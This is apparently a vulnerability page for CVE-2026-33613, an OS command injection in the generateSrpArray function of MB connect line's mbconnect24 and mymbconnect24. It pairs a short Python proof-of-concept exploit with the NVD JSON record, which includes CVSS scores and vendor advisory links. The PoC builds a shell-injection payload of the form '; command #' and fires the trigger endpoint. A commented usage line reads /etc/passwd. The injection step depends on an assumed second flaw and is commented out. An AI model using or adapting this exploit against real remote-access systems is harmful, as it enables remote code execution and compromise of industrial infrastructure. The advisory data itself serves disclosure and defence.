CVE-2026-33613

# Conceptual Proof of Concept for CVE-2026-33613 # This PoC demonstrates the OS command injection vulnerability. import requests def exploit(target_url, command): # The attacker needs to inject this payload into the user table first. # Assuming the vulnerable parameter is 'username' in the user table. payload = f"; {command} #" # Step 1: Inject payload (Assuming an auxiliary vulnerability allows writing to user table) # data = {"username": payload} # requests.post(f"{target_url}/api/update_user", data=data) # Step 2: Trigger the generateSrpArray function # This triggers the OS command execution response = requests.get(f"{target_url}/api/generate_srp") print(f"Executed command: {command}") print("Check server response for output or verify shell access.") # Usage example # exploit("http://target-ip", "cat /etc/passwd")

{"cve": {"id": "CVE-2026-33613", "sourceIdentifier": "[email protected]", "published": "2026-04-02T10:16:15.727", "lastModified": "2026-04-16T15:49:47.683", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Due to the improper neutralisation of special elements used in an OS command, a remote attacker can exploit an RCE vulnerability in the generateSrpArray function, resulting in full system compromise.\nThis vulnerability can only be attacked if the attacker has some other way to write arbitrary data to the user table."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H", "baseScore": 7.2, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "HIGH", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.2, "impactScore": 5.9}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "baseScore": 8.8, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.8, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-78"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:mbconnectline:mbconnect24:*:*:*:*:*:*:*:*", "versionEndIncluding": "2.19.4", "matchCriteriaId": "FF88F461-51FB-482C-A406-07F72FC10D79"}, {"vulnerable": true, "criteria": "cpe:2.3:a:mbconnectline:mymbconnect24:*:*:*:*:*:*:*:*", "versionEndIncluding": "2.19.4", "matchCriteriaId": "36E8693F-94C4-46A4-BD83-D87B71B89F12"}]}]}], "references": [{"url": "https://certvde.com/de/advisories/VDE-2026-030", "source": "[email protected]", "tags": ["Third Party Advisory"]}, {"url": "https://mbconnectline.csaf-tp.certvde.com/.well-known/csaf/white/2026/vde-2026-030.json", "source": "[email protected]", "tags": ["Vendor Advisory"]}]}}